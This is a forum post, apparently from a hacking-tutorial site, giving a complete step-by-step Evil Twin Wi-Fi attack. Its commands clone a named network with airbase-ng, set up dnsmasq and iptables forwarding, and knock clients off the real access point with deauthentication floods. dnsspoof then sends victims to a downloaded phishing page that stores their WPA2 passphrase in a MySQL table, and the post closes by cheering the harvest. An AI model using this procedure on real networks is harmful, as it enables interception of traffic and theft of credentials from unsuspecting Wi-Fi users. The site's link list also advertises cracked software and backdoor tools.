Best Telegram Programming Groups For Coders &Developers   It Wasn’t Me - Secure Your Account   Mr.Robot All Seasons 1,2,3 Full | Free Torrent Download   Mr.Robot All Seasons 1,2,3,4 Full | Watch Online [FREE]   5 Tips Will Keep You Safe During Christmas Holiday’s Online Shopping   You Can Get All Adobe Apps For $30 a Month Right Now   How To Wipe An iPhone Clean (ERASE) Before Selling?   Programming Languages To Learn To Be An Expert Hacker!   Cybercriminals exchange tips on underground forums about avoiding arrests   A comprehensive look into emerging Signal encrypted messaging application   A Detailed Comparison of WhatsApp, Telegram & Signal   How Telegram End-to-end Encryption Works To Provide Security ?   Flubot Malware is Spreading Quickly Through Android Devices   WhatsApp End-to-End Encryption and its Privacy Importance - Alternatives,Signal & Telegram   What is Credit Card Skimming And How To Protect Yourself From it ?   Where to hire react programmer and 3 essential skills to look for   Top 8 Basic Google Search Dorks [Live Examples]   [Penetration Testing] Top 70 Most Interview Questions   Why VPN Is Necessary ? [Detailed Guide]   Top 10 Dangerous Viruses Of All Times   List Of Common HTTP Error Status Codes   “Hello World!” Program In Different Programming Languages   100 Basic Computer Related G.K. Questions   Email Security - Tips And Tricks   Fonts Hub Collection (Free Design Resources)   Top 8 Softwares Free Download - No Credit Card Needed [2022 Update]   Shortcomings That Leads An Entrepreneur Towards Failure   5 Basic Steps To Protect Your Personal Data Online   What is Intel SGX and What are the Benefits ?   15 Things You Need to Know About Maintaining The Logs   How to think like a programmer - lessons in problem solving   How To Get Voice Like Anonymous Voice   Life Story of Microsoft Founder Bill Gates - Documentary   Own Private Search Engine in Linux Will Save Our Privacy   Best Etcher alternatives to Create Bootable USB   Music For Programming - Coding Music / Hacking Music   School Management Software v3.1 Premium + Crack   JavaFX Chat Client/Server + Source Code   Top 25 Keyword Research Tools [Search Engine Optimization]   A Quick SEO Checklist - 2023 Update   Online Domain Authority (DA) Rank Checker Websites   33 Things In SEO For Which Google Will Give Your Student Blog High Positions   How to Close the Site from indexing using robots.txt   10 SEO Tools all Small Businesses Need in 2023   Earth Rise Application + Code   Animation along a path + Code   Zen Pong Game in Java Language + Code   Simple Flying Bird Game + Code Files   Game Snake Simple + Code Files   The Space 'Sun & Earth' | HTML,CSS,JavaScript   File System in Web (Explorer in Windows and Finder in OSX)   Admin Dashboard Template built using Bootstrap + Code   Website Template For Admin Dashboard + Code   Youtube Playlist Downloader Script   How To Create A Stopwatch In Python   Python TicTacToe with Tk and minimax AI   Deskreen turns any device with a web browser into a secondary screen for your computer   Download Algorithms Book | Dummies Store   OSI Model And TCP/IP Model   How to Fix SSH Failed Permission Denied (publickey,gssapi-keyex,gssapi-with-mic)   What Is Load Balancing? Definition and How It Works   How to Setup FTP Server on Your Raspberry Pi   Download Windows 10 Lite Edition x64 | Direct Link   How To Recover Permanently Deleted Files In Windows 10 ?   How to make Fake Error Message Script in Windows   20 Essential Windows keyboard Shortcuts that will make you forget your mouse   How To Fix The DLL Missing Error In Windows 7 ?   Create Hotspot on Windows 10 in 6 steps   Download Microsoft Office Professional Plus 2016   Download DriverPack Solution Offline | Full   How To Create Simple And Password Protected ZIP File in Linux   2 Ways To Save Terminal Output of a Command in Linux   6 Best Tools to Monitor Disk IO Performance in Linux   Top 15 Best Websites (Blogs) to Learn Linux Online   How to Delete files older than 30 Days in Linux   What is the difference between apt and apt-get command   Fail2Ban Installation & Setup: Ubuntu, CentOS, Fedora & Debian   How to List Running Processes in Linux   How to Use the who Command in Linux with Examples   FOREMOST - Recover Permanently Deleted Files Easily in Kali Linux   Funny Linux Commands to Try   Command line interface guidelines, to help you write better command-line programs ...   How to Install Google Chrome Web Browser on Ubuntu 20.04   Learn Adobe Photoshop | 33 Episode Course   Window Privilege Escalation: Automated Script   Linux Privilege Escalation: Automated Script   How To Retrieve & Decrypt Stored Passwords in Firefox & Chrome Remotely   ACLight: An Advanced Privileged Account Discovery Tool   How to change Lock Screen Background on Kali Linux XFCE   Best 20 Kali Linux Tools For Hacking And Penetration Testing   How to Run Windows Application and Games on Kali Linux   How to run C and C++ programs in Kali Linux   Control Kali Linux PC From any Mobile or Tablet   How to Enable root User Account in Kali Linux   How to Configure Static IP address in Kali Linux   Bash vs ZSH in Kali Linux   [Solved] E: Unable to locate package in Kali Linux   Hosting a Local Website with Domain Name on Kali Linux over WiFi   Install Docker in Kali Linux and Run Other OS   How to Install Kali Linux | A Total Guide to Install Kali Linux   NetHunter Rootless - Official Kali NetHunter for non rooted phones   How to set up own VPN server in 10 minutes on Kali Linux using OpenVPN   Configuring The ProxyChains   Install Python3 in Kali Linux   TempoMail - Command Line Temporary Email in Linux   NIPE - Fully Anonymize Total Kali Linux System   How to Install Google Chrome & Chromium on Kali Linux [Official Method]   15 Best Laptops For Kali Linux & Cyber Security - Check This Before Buy   Volatolity - Digial Forensic Testing of RAM on Kali Linux   Limit the Internet Speed of LAN Users [Evil Limiter]   Find Virtual Machine IP Through Kali Linux - 3 Methods   Privilege Escalation with PowerShell Empire and SETOOLKIT [Kali Linux]   How to use kill, pkill and killall Commands to Kill any Linux Process   20 Useful Tar Commands For Extraction and Compression   Create a Fake AP with DNSMASQ and HOSTAPD [Kali Linux]   How to Fully Anonymize Your Linux System with Tor using Nipe   Hack Windows/Linux using ARCANUS Framework – 100% FUD   Simple and Target Mac Flooding - Kali Linux   Get Free Kali Linux on AWS with Public IP - Real Time Penetration Testing   What’s the difference Between Tails and Tor browser?   Does Tor Hide you From Your ISP? Should I surf internet using Tor ?   Wireshark for Pentester: Decrypting RDP Traffic   Exploit Wi-Fi Vulnerabilities with Routersploit on Termux and Linux   Man in The Middle Attack & How To Prevent it   Masscan - 1000 Times Faster Than NMAP   Wireshark - Shark in Wires | Network Protocol Analyzer in Kali Linux   Wifite - Easy Automated Wireless Attack   WiFi-Pumpkin 3 - Dangerous Access Point   Evil Twin Attack with DNSMASQ - Wireless WPA2-PSK Cracking   Sniffing with Rogue Access Point [DNSMASQ and TCPFLOW]   Hack Wi-Fi Settings of Windows Machine Remotely [After Meterpreter]   Wi-Fi deauthentication attack against 802.11 protocol   Bypass Hidden SSID in a Wireless Network [Full Proof Method]   Crack WPA/WPA2-PSK using Aircrack-ng and Hashcat   Crack WPA2-PSK Wi-Fi with automated python script - FLUXION PART 1   Set Default Version of Python : [SOLVED] update-alternatives: error: no alternatives for p   Python Scripting: Information Gathering and Automating Ethical Hacking   15 Essential Meterpreter Commands Everyone Should Know   Find Vulnerable Webcams with Shodan [Metasploit Framework]   TCP & SYN Scanning with Metasploit Framework without NMAP   Meterpreter Useful Top 60 Commands List   The Web Application Hacker's Handbook 2   Hacking GPS Book   MadCam - Termux Hack Front camera by Sending link   How to Download Files In Termux   IPdrone Termux - Find Location of Person it IP in Termux   ReconDog Termux - Best Reconnaissance Tool For Termux   Termux SSH: Use Termux in Windows Using SSH Server   How to Install and Use Fsociety-Tool In Termux   Termux-YTD : Download Youtube Videos with Termux   Use CMatrix Package Like a Pro   L3MON - Access Android Devices Remotely   Hack Android using Metasploit over LAN/WAN   Ghost Framework - Control Android Devices Remotely   Top 10 Vulnerable Android Applications [Penetration Testing]   Find Hidden Subdomains on Any Website with Subfinder   Blind Sql Injection with Regular Expressions Attack   Useful Google Dorks For Bug Bounty Hunters   HTML5 Security CheatSheet - What your browser does when you look away...   30,000 Sites Is In RISK, The Plus Addons For Elementor WordPress Plugin Hacked   WPScan - Find Vulnerabilities in WordPress Websites on Kali Linux   Wapiti - Automated Vulnerability Scanner   Generate 100% FUD Backdoor with TheFatRat - Windows 10 Exploitation   TheFatRat hacking tool to create undetectable backdoors   How to Make a Keylogger in Python + Code   How to create a keylogger in PowerShell ?   Backdoor Program using Python (Remote Access Explain)   Man in the Middle Attack with Websploit Framework   Hack Windows 10 Remotely over WAN with Metasploit [No Port Forwarding]   15 Powerful Gadgets For Ethical Hackers | Hardware Tools for Hackers   Find Vulnerabilities using NMAP Scripts (NSE)   Free Vulnerability Database And Resources   Firefox Browser Vulnerable to (MITM) Man-in-the-Middle Attack   Find Vulnerabilities in Military Networks By Participating Hack The Army Bug Bounty Progr. 

x32x01

ADMINISTRATOR

5_6_2021 7_09_47 PM.png

Ever heard of an evil twin AP?
An evil twin AP is like a rogue access point. The attacker creates a fake wireless AP to lure users into thinking it’s a trusted wireless network. They amplify their signal in a way where the client will automatically connect to them because the beacons are faster and closer in range. Tools such as Honeypot, CqureAP, D-Link G200, HermesAP, Rogue Squadron, and WifiBSD can perform these attacks.

The evil twin AP is an access point that looks and acts just like a legitimate AP and entices the end-user to connect to our access point. Our aircrack-ng suite has a tool, airbase-ng, that can be used to convert our wireless adapter into an access point. This is a powerful client-side hack that will enable us to see all of the traffic from the client, conduct a man-in-the middle attack and can even crack the wireless network key.

In today’s society, we see a lot more users getting compromised, especially in public Wi-Fi locations. There may be an open wireless network, weak encryption, or just plain trust issues. But before we begin, you’ll probably need some proper equipment to follow the demonstration of Evil Twin Attack:

Hardware Used
  • Windows 10 (Base Machine) – With Ethernet Connectivity
  • Kali Linux 2021 (VM Machine) – With NAT Mode Enabled
  • USB Wireless TP-LINK Adapter – 150 MBPS
Tools Required
  • VMWare Workstation 14
  • Kali Linux 2021 OS
  • Airmon-ng, Airodump-ng, Airbase-ng and Aireplay-ng
  • dnsmasq
  • iptables
  • Apache and MySQL
Make sure that you must run apt-get update command which updates the list of available packages and their versions, but it does not install or upgrade any packages.

apt-get upgrade actually installs newer versions of the packages you have.


Step 1 – Install dnsmasq Package directly by typing “apt-get install dnsmasq -y“.

Dnsmasq provides network infrastructure for small networks: DNS, DHCP, router advertisement and network boot. It is designed to be lightweight and have a small footprint, suitable for resource constrained routers and firewalls.

It has also been widely used for tethering on smartphones and portable hotspots, and to support virtual networking in virtualisation frameworks. Supported platforms include Linux (with glibc and uclibc), Android, *BSD, and Mac OS X. Dnsmasq is included in most Linux distributions and the ports systems of FreeBSD, OpenBSD and NetBSD.

If dnsmasq package is already installed in your machine, then you can skip this step.


Step 2 – Create a configuration file for dnsmasq with the help of gedit editor (Our Favorite Graphical Editor) and add the following code into it as shown below:
Code:
sudo gedit /root/Desktop/dnsmasq.conf
Code:
interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1


Step 3 – Before enabled monitor mode, make sure that your airmon-ng and NetworkManager won’t conflict to each other, otherwise you need to kill the network-manager or repeat the whole process.

Open network manager’s configuration file and put the MAC address of the device you want network-manager to stop managing:
Code:
gedit /etc/NetworkManager/NetworkManager.conf

Now add the following at the end of the file:
Code:
[keyfile]
unmanaged-devices:mac=AA:BB:CC:DD:EE:FF, A2:B2:C2:D2:E2:F2

NetworkManager.conf is a configuration file for NetworkManager. It is used to set up various aspects of NetworkManager’s behavior. The location of the file may be changed through use of the “–config=” argument for NetworkManager.


Step 4 – Connect your USB Wireless Adapter and confirm it with the help of iwconfig command.

Here you can see a new interface named as wlan0 (It might be different for you).

In this case, we’re using TP-LINK USB Adapter but you can use any of the wireless adapter like Alfa Card, D-Link, Netgear etc.

With command “ifconfig wlan0 up” brings your wireless interface up.


Step 5 – Put your card into monitor mode by typing “airmon-ng start wlan0

A new interface will be created (wlan0mon in our case), which is the interface name you will need to use in other applications.


Step 6 – Now its time to start the monitoring of all AIR packets with the help of following command:
Code:
airodump-ng wlan0mon

Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vector) for the intent of using them with aircrack-ng.

The things which we need from above command output is:
  • Target BSSID – 84:10:0D:9E:A1:CD
  • Target Channel – 7
  • Target ESSID – Yeahhub
Where, BSSID is the MAC address of the access point and ESSID is the name of the wireless network so called SSID which can be empty if SSID is in hidden mode.


Step 7 – If we do everything right, we can clone his AP and get him to connect to our evil twin. When he does that, we’ll be able to see all of his traffic, as well as potentially inserting our own packets/messages/code into his computer.

To create a fake AP with airbase-ng, type the following command into new terminal:
Code:
airbase-ng -e “Yeahhub” -c 7 wlan0mon

Airbase-ng is multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself. Since it is so versatile and flexible, summarizing it is a challenge.


A new tap interface at0 will be created, which acts as the “wired side” to the AP. In order to use the AP, this new interface must be brought up with ifconfig and needs an IP.


The assigned MAC is automatically set to the BSSID [by default the wireless interface MAC]. Once an IP is assigned and the client uses a static IP out of the same subnet, there is a working Ethernet connection between the AP and the client. Any daemon can be assigned to that interface, for example a dhcp and dns server.

Together with kernel ip_forwarding and a proper iptable rule for masquerading, the AP acts as a wireless router.

Step 8 – For the at0 to allocate IP address we need to assign an IP range to itself first.
Code:
ifconfig at0 10.0.0.1 up

Now we will use our default Internet facing interface, eth0, to route all the traffic from the client through it. In other words, allowing victim to access the internet and allowing ourselves(attacker) to sniff that traffic.

For that we will use iptables utility to set a firewall rule to route all the traffic through at0 exclusively.
Code:
iptables –flush
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT

By default any modern Linux distributions will have IP Forwarding disabled. This is normally a good idea, as most peoples will not need IP Forwarding, but if we are setting up a Linux router/gateway or maybe a VPN server (pptp or ipsec) or just a plain dial-in server then we will need to enable forwarding.

Entering “1” in the ip_forward file will tell the system to enable the rules defined in the IPtables and start forwarding traffic(if any).
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward


Step 9 – Our Evil Twin attack is now ready and rules has been enabled, now we will start the dhcp server to allow fake AP to allocate IP address to the clients.

Start the DHCPD listener with the help of dnsmasq tool by typing the following command:
Code:
dnsmasq -C /root/Desktop/dnsmasq.conf -d

If it shows some kind of error related to “dnsmasq: failed to create listening socket for port 53: Address already in use” as shown below:


Then you need to find the process ID number and kill all processes related to that process ID.
Code:
netstat -anlp | grep -w LISTEN
sudo ps -f -p 1975
sudo kill 1975

After killing the process, repeat the same command. It should works now!


Step 10 Next step is to start the Apache and MySQL Services by typing the following commands:
Code:
/etc/init.d/apache2 start
/etc/init.d/mysql start


Step 11 – We have our Evil Twin attack vector up and working perfectly. Now we need to setup our fake site in action so that victim will see the page while browsing and enter the passphrase which he/she uses for his/her access point.

To do this, please download the following zip file with the help of wget command in /var/www/html directory.
Code:
cd /var/www/html
wget https://www.yeahhub.com/wp-content/uploads/2018/09/Yeahhub-ap.zip


Step 12 – Now unzip the above downloaded Yeahhub-ap.zip file by typing:
Code:
unzip Yeahhub-ap.zip


The above command will extract the contents of Yeahhub-ap.zip file and copy them to the Apache’s html directory so that when the victim opens the browser he/she will automatically be redirected to the default index.html webpage.

Step 13 – Now to store the credentials entered by the victim in the html page, we need an SQL database.

You will see a dbconnect.php file for that, but to be in effect you need a database created already so that the dbconnect.php will reflect the changes in the DB.
Code:
mysql -u root -p


Step 14 – Create a new user fakeap and password fakeap by typing the following command:
Code:
create user fakeap@localhost identified by ‘fakeap’;


Step 15 – Now create a new database with name rogue_AP by typing:
Code:
create database rogue_AP;

And to use that database type “use rogue_AP;


Step 16 – Next step is to create a table of name wpa_keys where all the passwords will save entered by user.
Code:
create table wpa_keys(password1 varchar(32), password2 varchar(32));


Step 17 – Next, Grant all the permissions to fakeap user.
Code:
grant all privileges on rogue_AP.* to ‘fakeap’@’localhost’;


Step 18 – Exit from MySQL and connect with now fakeap user by typing:
Code:
mysql -u fakeap -p

Here password is also fakeap


Step 19 – Select rogue_AP database by typing:
Code:
use rogue_AP;

And Inset a dummy entry into wpa_keys table just for testing:
Code:
insert into wpa_keys(password1, password2) values (“testpass”, “testpass”);

And to view the contents of wpa_keys table, the command is:
Code:
select * from wpa_keys;


Note that both the values are same here, that means password and confirmation password should be the same.

Our attack is now ready just wait for the client to connect and see the credential coming.

In some cases your client might already be connected to the original AP. You need to disconnect the client as we did in the previous tutorials using aireplay-ng utility.

Step 20 – To deauth the active clients, the command is:
Code:
aireplay-ng –deauth 0 -a <BSSID> wlan0mon

–deauth 0 means Unlimited deauthentication requests but you can also limit the request by entering natural numbers.


As soon a client connects to your AP you will see an activity in the airbase-ng terminal window like this:


Step 21 – Now to simulate the client side we’re connected the fakeAP(Yeahhub) on another windows machine laptop and using a Firefox web browser to illustrate the attack.

Victim can now access the Internet. You can do 2 things at this staged:
  • Sniff the client traffic
  • Redirect all the traffic to the fake AP page – And that’s what we wanna do.
To redirect the client to your fake page, here you need to run dnsspoof utility which is already pre-installed in every Kali Linux Machine on interface at0 created by airbase-ng command:
Code:
dnsspoof -i at0

DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System data is introduced into the DNS resolver’s cache, causing the name server to return an incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker’s computer (or any other computer).


Step 12 – Now go back to Victim’s machine and access google.com and you’ll see that, the google.com webpage is showing your fake webpage which you hosted in your Kali Linux machine which tell the victim to enter the password to download and upgrade the firmware.


Here we’re entering “yeahhub@123” as the password that we (Victim) think is his/her AP’s password.

As soon as the victim presses [ENTER] you can see the below screen with a page loading kinda.


Now coming back to attacker side. You need to check in the MySQL database for the stored passwords.

Just type the previously used command in the MySQL terminal window and see whether a new update is there or not.


Yippie! you have successfully harvested the WPA2 passphrase, right from the victim, in plain text.
 
Top